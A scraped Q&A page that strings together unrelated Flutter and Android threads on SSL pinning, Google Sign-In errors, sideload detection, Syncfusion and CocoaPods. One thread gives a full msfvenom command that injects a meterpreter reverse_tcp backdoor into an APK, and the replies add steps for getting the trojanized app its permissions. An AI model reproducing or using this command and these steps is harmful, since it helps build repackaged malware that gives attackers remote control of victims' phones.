I have read this answer regarding default behavior of ssl pinning in flutter.
But my security tester said that my apk still has ssl pinning installed, with screenshot below:
Looking at list java files at right, does it related with my code or are those comes from package only?
confirmed by this answer
libflutter.so (the flutter engine)
libapp.so (your code).
so any .java files from MobSF is apparently 3rd party or flutter library, not from my code
Related
I implemented google login in flutter without using firebase in flutter (google cloud console). It was working in apk then later I needed push notification service for which I used firebase (fcm token and all) then I released the app to playstore but google login does not work. I keep getting apiexception error. Has anybody faced this issue? if yes any help would be highly appreciated.
I do not have a specific answer to your problem but I have also faced this problem once, I accidentally resolved it though.
But Error 12500 is a general error code that may occur when attempting to use the Google Sign-In feature and is caused by a few potensial issues:
An issue with the SHA-1 fingerprint of your app's signing
certificate: To use Google Sign-In, you need to configure your app's
SHA-1 fingerprint and package name in the Firebase console. Make
sure that the fingerprint and package name you have configured in
the Firebase console match the ones you are using to sign your app.
An issue with the Google Services configuration file: Make sure you
have properly added the Google Services configuration file to your
app.
An issue with the Google Play Services library: Make sure you have
the latest version of the Google Play Services library installed in
your app.
An issue with the device or emulator you are using: Make sure you
are testing on a device or emulator that has Google Play Services
installed and is up to date.
Possible fixes to try/check:
Double-check the SHA-1 fingerprint and package name: Make sure that
the SHA-1 fingerprint and package name you have configured in the
Firebase console match the ones you are using to sign your app.
Make sure you have added the Google Services configuration file: The
Google Services configuration file is required for your app to
communicate with Google services, including Google Sign-In. Make
sure you have properly added this file to your app.
Update the Google Play Services library: Make sure you have the
latest version of the Google Play Services library installed in your
app. You can check for updates by going to the "SDK Manager" in
Android Studio.
Test on a device or emulator with Google Play Services installed:
Make sure you are testing on a device or emulator that has Google
Play Services installed and is up to date.
I hope this helps! I will quickly search if I can find any other solution.
Some of my applications are downloaded from the playmarket, ads are removed and posted on various sites in apk format for manual installation. Is there any legal way in flutter to check when the application is launched how it was installed?
There is currently a package developed that checks exactly what you want.
I tried to use flutter for web with syncfusion library. I ran into compilation issues. Has anyone tried that integration ?
I used flutter channel beta (since my development was targeted for web and mobile both)
We have tried to replicate your scenario, unfortunately, we are not able to replicate any compilation issues while running on the web. So, kindly please make sure that you are using the current version of our chart widget 18.1.46. If you are not using the current version, please upgrade to the current version and try to replicate the issues and revert us with more information on the compilation issues and a sample attachment would be appreciable so that it will be helpful in providing the solution sooner.
And also, please follow the instruction in the link below to build the flutter application in the web.
https://flutter.dev/docs/get-started/web.
Note: I work for Syncfusion
I'm trying to trying to inject an apk with msfvenom payload, and thus get a backdoor on my android device upon installing it. Why isn't it asking for permissions upon installation?
In the past I've been able to successfully create a standalone payload and get a backdoor tunnel to my device.
msfvenom -p android/meterpreter/reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST=[IP] LPORT=[port] -o /Users/root/Desktop/android.apk
I expected the app to ask for all the permissions specified in manifest file, but it isn't asking for any during installation or at runtime.
I had the same problem, but I have found a fix for it.
create apk file injected with payload.
install it on your phone.
install APK Editor pro v1.9.7.
open the apk editor and search for the injected apk click on it and click on COMMON EDIT.
change Minimum SDK version to 10 and Target SDK Version to 17.
I have already checked it and it's working
You need to specify what permissions the Main.apk has in your device..did you check those?If it has not asked for permission chances are it has no permission.
I have found some problems in the payload generation, but I have also found a solution.
1.- Inject the payload in the original application.
2.- Install the apk file on an android device.
3.- Go to application settings and search for the infected application.
4.- Grant all permissions.
And that's it, this worked for me.
I can't see what caused it. I hope I can get your help. Thank you.
Enter ./ios folder and run pod install. Try and see the output, it's the one you see in AS. I guess you are using a library that needs Pods.
Cocoapods is one of default library dependency tool (along with Carthage).
Flutter uses Cocoapods.
The reason why on Android all is fine, is because the flutter library you are using on the Android side acts different rather than on iOS side.
On iOS side, as I said before, talks to the native layer using a library added with pods. And this has errors.
Here something is wrong, you need to figure out why pods have errors.
Specifically you have a problem with MTBBarcodeScanner.
See the ./ios/Podfile (you can also post it on your question so we could see it) and try figuring out what's the problem with this pod dependency.